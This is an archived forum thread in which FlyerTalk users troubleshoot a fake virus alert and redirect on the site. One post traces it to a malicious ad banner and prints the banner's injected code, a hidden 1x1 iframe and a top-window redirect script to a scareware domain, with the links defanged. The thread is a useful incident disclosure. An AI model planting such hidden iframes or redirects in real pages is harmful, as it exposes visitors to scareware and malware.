FlyerTalk Forums

FlyerTalk Forums (https://www.flyertalk.com/forum/index.php)
-   Technical Support and Feedback (https://www.flyertalk.com/forum/technical-support-feedback-386/)
-   -   FALSE Virus alert [there is NO malware on your computer] (https://www.flyertalk.com/forum/technical-support-feedback/1368367-false-virus-alert-there-no-malware-your-computer.html)

PotNoodle Jul 31, 2012 5:09 pm


Originally Posted by IBobi (Post 19036253)
Has anyone with an ads-free account (Faces of FlyerTalk, for example) been subjected to the redirect/virus warning?

Note that if you ever visit FlyerTalk without logging in, your ads-free status does not apply then, and an ad could cause this warning.

Thank you,

Paul

What is a free ads account and how do you get one?

And the alert always appears very very soon from typing in the Flyertalk URL so I doubt people had a chance to logon before there were molestered with this warning.

I usually type ww.flyert and then suggestions appear and I click straight onto BA executive club and the warning appears every time I have not accessed the site for a while without fail.

Maybe you could ask people to fill in a small questionnaire to agther similar characteristics and to be able to replicate the problem.

holmedown Jul 31, 2012 5:15 pm

IE 9
shortcut in favorites to : http://www.flyertalk.com/forum/

also does in on IE 8 on laptop - same shortcut

blackjack-21 Jul 31, 2012 7:32 pm

Most recent warning for me was yesterday morning. Later in the evening no problem, and this afternoon was okay also. Coincidence, or does time of day (in my case the most warnings have popped up usually very early 3-4 AM eastern time, or a bit later in the morning) have anything to do with it occuring?

Anyone seeing something similar timewise?

bj-21.

jamesteroh Jul 31, 2012 9:23 pm


Originally Posted by blackjack-21 (Post 19037094)
Most recent warning for me was yesterday morning. Later in the evening no problem, and this afternoon was okay also. Coincidence, or does time of day (in my case the most warnings have popped up usually very early 3-4 AM eastern time, or a bit later in the morning) have anything to do with it occuring?

Anyone seeing something similar timewise?

bj-21.

If I am up late I seem to get it a few minutes after midnight

duluthDL Jul 31, 2012 9:34 pm

As noted by others, I generally get only one per 24 hour period.

Doug_1970 Aug 1, 2012 12:33 am


Originally Posted by holmedown (Post 19036466)
IE 9
shortcut in favorites to : http://www.flyertalk.com/forum/

also does in on IE 8 on laptop - same shortcut

I'm exactly the same as this.

Jay2261 Aug 1, 2012 3:58 am

After advice on this forum I started using Chrome when accessing Flyertalk and have had no problems with this fake virus thing....yesterday I mistakenly used IE and lo and behold up pops the virus warning so if you can use Chrome!

dioxide45 Aug 1, 2012 4:45 am


Originally Posted by Jay2261 (Post 19038629)
After advice on this forum I started using Chrome when accessing Flyertalk and have had no problems with this fake virus thing....yesterday I mistakenly used IE and lo and behold up pops the virus warning so if you can use Chrome!

Started using Chrome also, though I use it for all websites not just FT. Another benefit is that it seems to run much faster than IE. Probably won't go back to IE. FT must own stock in Google.

MoneyBagger Aug 1, 2012 4:53 am

It is only happening for me when I am logged in - if I am logged out/cookies cleared, it doesn't seem to happen.

uk1 Aug 1, 2012 6:38 am

Can we have a little more feedback as to why this hasn't been repaired yet? I even sent screen shots and didn't even received an acknowledgement.

With all due respect11 days (with all the expert organisations available) to help detect and kill this issue feels to me like around 8 days longer than it should be. All feels as though the response is out of kilter with the urgency.

SkeptiCallie Aug 1, 2012 8:22 am

A new screen appeared today, when I used Chrome. Sgnificance: I think some IE material might have been residual when I went to Chrome.

Sequence of events:

(1) Browsed Internet (CNN), using IE. (My IE browser is set to delete cookies whenever IE browser is closed.)
(2) Still in IE, went to FlyerTalk.
(3) Clicked on Forums.
(4) Virus-alert message appeared, on an all-white background, without any Flyertalk screen in the background. Made a snip.
(5) Tried to right-click for page source but nothing worked except Ctrl Alt Del.
(6) Turned computer off, using on-off button.
(7) Turned computer back on. (Note that at this point IE had not been automatically closed down, which would have deleted cookies automatically--though of course it did not reopen when I restarted the computer.)
(8) Opened Chrome. (IE is still off.) Went to Flyertalk.
(9) Could not open Chrome, got a new screen box, which read:



Plug-in Unresponsive

[yellow caution icon with exclamation mark) The following plug-in is unresponsive: Unknown

Would you like to stop it? [boxes to check] Yes No
(10) Checked IE for residual cookies, found a Favicon (right-clicking showed this as owned by Flyertalk), and an "IE9 CompatViewList.xml", which rightclicking on showed as owned by Microsoft.

I can send a snip of the new screen but would need instructions on how to PM a jpg file.

MoneyBagger Aug 1, 2012 8:33 am

Urgent @ Admin

I have found the source of the redirect (all links have been delibrately broken by me in the http bit to inadvertently stop any users clicking on them):

It is coming from the HotelDetect banner (which is hosted here hxxp://adliclick.com/banner.php?campaign_id=12175&rc=475737972919972). This is a copy of the request header:


(Request-Line):GET /banner.php?campaign_id=12175&rc=475737972919972 HTTP/1.1
Accept:application/javascript, */*;q=0.8
Referer:http://www.flyertalk.com/forum/
Accept-Language:en-GB
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding:gzip, deflate
Host:adliclick.com
Connection:Keep-Alive

This appears to be a bogus site.

The above banner page contains the following malicious code:


document.write('<a href="hxxp://hoteldetect.net" target="_blank"><img src="hxxp://adliclick.com/banners/12175/475737972919972/1.jpg" alt="" style="border:none" /></a>');document.write('<iframe src="hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" width="1" height="1"></iframe>');
The iframe within this code is redirecting to a html page (hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX) which contains the following HTML code:


<html>
<body>
<script>
window.top.location.href="hxxp://systemoptimizerdeliverer.pl/m936f48zl6/al/78dee9e271084cb2/196/";
</script>
</body>
</html>
I cannot find exactly where the source for the adliclick.com is coming from in your source code (I strongly suggest checking all your scripts for references to it), but I have a copy of the source codes from all sites when the redirect hit me. Let me know if you want copies.

Djlawman Aug 1, 2012 8:40 am

Good job MoneyBagger. (Work that should have been done by IB/Flyertalk over a week ago.)

LiviLion Aug 1, 2012 8:55 am

Nice work MoneyBagger.

Doug_1970 Aug 1, 2012 9:41 am


Originally Posted by MoneyBagger (Post 19039734)
Urgent @ Admin

I have found the source of the redirect (all links have been delibrately broken by me in the http bit to inadvertently stop any users clicking on them):

^ Good job.

Just for my academic interest, how hard was this to work out? Was it something that any competent IT person could work out, or was it more specialised?


All times are GMT -6. The time now is 4:27 pm.


This site is owned, operated, and maintained by MH Sub I, LLC dba Internet Brands. Copyright © 2026 MH Sub I, LLC dba Internet Brands. All rights reserved. Designated trademarks are the property of their respective owners.